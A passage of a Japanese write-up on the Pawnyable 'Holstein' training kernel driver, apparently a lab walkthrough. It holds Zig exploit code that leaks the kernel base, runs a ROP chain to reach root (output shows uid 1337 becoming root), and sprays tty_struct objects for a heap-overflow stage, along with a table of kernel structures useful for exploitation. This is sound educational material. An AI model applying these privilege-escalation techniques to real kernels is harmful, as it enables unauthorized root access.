�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37menv�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[36mnull�[0m�[1m�[37m]�[0m�[1m�[36m?�[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m{};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mexecveZ�[0m�[1m�[37m(�[0m�[33m"/usr/bin/whoami"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37margs�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37margs�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37menv�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37menv�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m]))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mleakBaseAddress�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x408�[0m�[1m�[36m+�[0m�[1m�[36m8�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0x408�[0m�[1m�[37m..]).�[0m�[1m�[36m*�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[36m0x13d33c�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37mcatchSigsegv�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mwhoami�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37msaveState�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/holstein"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mkernel_base�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mleakBaseAddress�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base: 0x{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfmt�[0m�[1m�[37m.�[0m�[37mbytesToHex�[0m�[1m�[37m(�[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[1m�[36m8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mkernel_base�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlower�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkernel_base�[0m�[1m�[36m-�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37mwhoami�[0m
�[1m�[37m./exploit�[0m
�[1m�[37mwhoami: unknown uid 1337�[0m
�[1m�[37m[INFO] Kernel base: 0xffffffff81000000�[0m
�[1m�[37m[INFO] You won!!�[0m
�[1m�[37mroot�[0m
(DIR) 完全なエクスプロイト
何故かよく分からないが、�[40m�[35m`ret2win`�[39m�[49mをジャンプした後で�[40m`SIGSEGV`
�[49mを受け取ってしまった。
�[40m�[35m`swapgs_restore_regs_and_return_to_usermode`�[39m�[49mはこ
の状況を避けるはずだったが、易きに付くことをしまし、そして�[40m�[35m`sigaction`�[39m�[49mでまた�
[40m�[35m`ret2win`�[39m�[49m呼んでいた。
=== �[1m�[4mv2: Heap Overflow�[22m�[24m
�[1m�[37m10c10�[0m
�[1m�[37m< MODULE_DESCRIPTION("Holstein v1 - Vulnerable Kernel Driver for Pawnyable");�[0m
�[1m�[37m---�[0m
�[1m�[37m> MODULE_DESCRIPTION("Holstein v2 - Vulnerable Kernel Driver for Pawnyable");�[0m
�[1m�[37m31,32c31,32�[0m
�[1m�[37m< char __user *buf, size_t count,�[0m
�[1m�[37m< loff_t *f_pos)�[0m
�[1m�[37m---�[0m
�[1m�[37m> char __user *buf, size_t count,�[0m
�[1m�[37m> loff_t *f_pos)�[0m
�[1m�[37m34,35d33�[0m
�[1m�[37m< char kbuf[BUFFER_SIZE] = { 0 };�[0m
�[1m�[37m<�[0m
�[1m�[37m38,39c36�[0m
�[1m�[37m< memcpy(kbuf, g_buf, BUFFER_SIZE);�[0m
�[1m�[37m< if (_copy_to_user(buf, kbuf, count)) {�[0m
�[1m�[37m---�[0m
�[1m�[37m> if (copy_to_user(buf, g_buf, count)) {�[0m
�[1m�[37m51,52d47�[0m
�[1m�[37m< char kbuf[BUFFER_SIZE] = { 0 };�[0m
�[1m�[37m<�[0m
�[1m�[37m55c50�[0m
�[1m�[37m< if (_copy_from_user(kbuf, buf, count)) {�[0m
�[1m�[37m---�[0m
�[1m�[37m> if (copy_from_user(g_buf, buf, count)) {�[0m
�[1m�[37m59d53�[0m
�[1m�[37m< memcpy(g_buf, kbuf, BUFFER_SIZE);�[0m
今回はヒープ攻撃。
スタック上でのデータをリークしたり、リターンアドレスを書き換えたりすることはできない。
だが問題ない⸺カーネル構造体をきちんと上書きすれば、権限昇格ができる。
ヒープオーバーフローが�[40m�[35m`g_buf`�[39m�[49mの後ろに書き込むができるが、どうやって構造体を必ず直後
に隣り合うように配置できる?
ヒープスプレーを使えば簡単だ。複数の構造体を確保すると、�[40m�[35m`g_buf`�[39m�[49mにあるスラブは構造体
を配置する、結果的に�[40m�[35m`g_buf`�[39m�[49mの直後に構造体がある可能性が高い。
�[33mfn�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[37mfds�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mfds�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mi�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfds�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/ptmx"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDONLY�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNOCTTY�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
SLUB(カーネルのヒープ確保ルーチン)はslab確保ルーチンなので、同じくらいサイズの構造体を同じslabに配置する。
なので、約�[40m`0x400`�[49mバイトの構造体は必要。
Table 1:�[24m
SLUBの様々のサイズ帯pwnに使えるカーネル構造体 (出典 [2])
| Generic Cache | Object
|
|---------------|--------------------------------------------------
| kmalloc-8 | pci�[3mfilp�[23mprivate signalfd_ctx
|
| kmalloc-16 | afs�[3mfile aa�[23mrevision
|
| kmalloc-32 | vmci�[3mhost�[23mdev seq�[3moperations (cg cache)
coda�[23mfile�[3minfo shm�[23mfile_data |
| kmalloc-64 | snd�[3minfo�[23mprivate�[3mdata snd�[23mctl_file
|
| kmalloc-96 | subprocess�[3minfo watch�[23mqueue vfio_container
|
| kmalloc-128 | dlm�[3muser�[23mproc
|
| kmalloc-192 | loopback�[3mpcm snd�[23mtimer�[3muser
pp�[23mstruct |
| kmalloc-256 | vhci�[3mdata snd�[23mcompr�[3mfile msg�[23mqueue
(cg cache) |
| kmalloc-512 | tls�[3mcontext mousedev�[23mclient
(�[40m`input`�[49m group) |
| kmalloc-1024 | pipe�[3mbuffer tty�[23mstruct sock xfrm�[3mpolicy
nouveau�[23mcli |
| kmalloc-2048 | super�[3mblock perf�[23mevent (SELinux disabled)
|
| kmalloc-4096 | net_device
|
�[40m�[35m`tty_struct`�[39m�[49m[^fn:2],
[^fn:3]は特に便利だね;�[40m�[35m`const struct tty_operations *ops`�[39m�[
49mを制御できれば、そのttyで�[40m�[35m`koioctl`�[39m�[49m[^fn:4]を呼び出すでき、ACE
(Arbitrary Code Execution)ができる。
また、ヒープのアドレスをリークすることができる。
後は2種類のリクが必要:カーネルアドレス(ROP gadgetのアドレスを計算為)とヒープアドレス(悪用の�[40m`struct
tty_operations *ops`�[49m�[24mのアドレスを分かり為)。
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@import�[0m�[1m�[37m(�[0m�[33m"std"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mheap�[0m�[1m�[36m-�[0m�[1m�[37mspray�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mttys�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m100�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m50�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/holstein"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m[�[0m�[1m�[36m50�[0m�[1m�[37m..]);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x400�[0m�[1m�[36m+�[0m�[1m�[36m0x100�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m{�[0m�[33m'A'�[0m�[1m�[37m}�[0m�[1m�[36m**�[0m�[1m�[36m0x400�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m{�[0m�[1m�[36m0�[0m�[1m�[37m}�[0m�[1m�[36m**�[0m�[1m�[36m0x100�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mbytes_read�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mdumpHex�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0x400�[0m�[1m�[37m..�[0m�[1m�[37mbytes_read�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc3f8�[0m�[1m�[37m �[0m�[1m�[36m01�[0m�[1m�[37m �[0m�[1m�[36m54�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m01�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[33m.T..............�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc408�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m50�[0m�[1m�[37m �[0m�[1m�[36mD3�[0m�[1m�[37m �[0m�[1m�[36m02�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mC3�[0m�[1m�[37m �[0m�[1m�[36m81�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33m.P..............�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc418�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[33m2...............�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc428�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m38�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33m........8X␍.....�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc438�[0m�[1m�[37m �[0m�[1m�[36m38�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36m48�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33m8X␍.....HX␍.....�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc448�[0m�[1m�[37m �[0m�[1m�[36m48�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36m70�[0m�[1m�[37m �[0m�[1m�[36m7D�[0m�[1m�[37m �[0m�[1m�[36m73�[0m�[1m�[37m �[0m�[1m�[36m02�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33mHX␍.....p}s.....�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc458�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[33m................�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc468�[0m�[1m�[37m �[0m�[1m�[36m70�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36m70�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33mpX␍.....pX␍.....�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc478�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[33m................�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc488�[0m�[1m�[37m �[0m�[1m�[36m90�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36m90�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33m.X␍......X␍.....�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc498�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[33m................�[0m�[1m�[37m�[0m
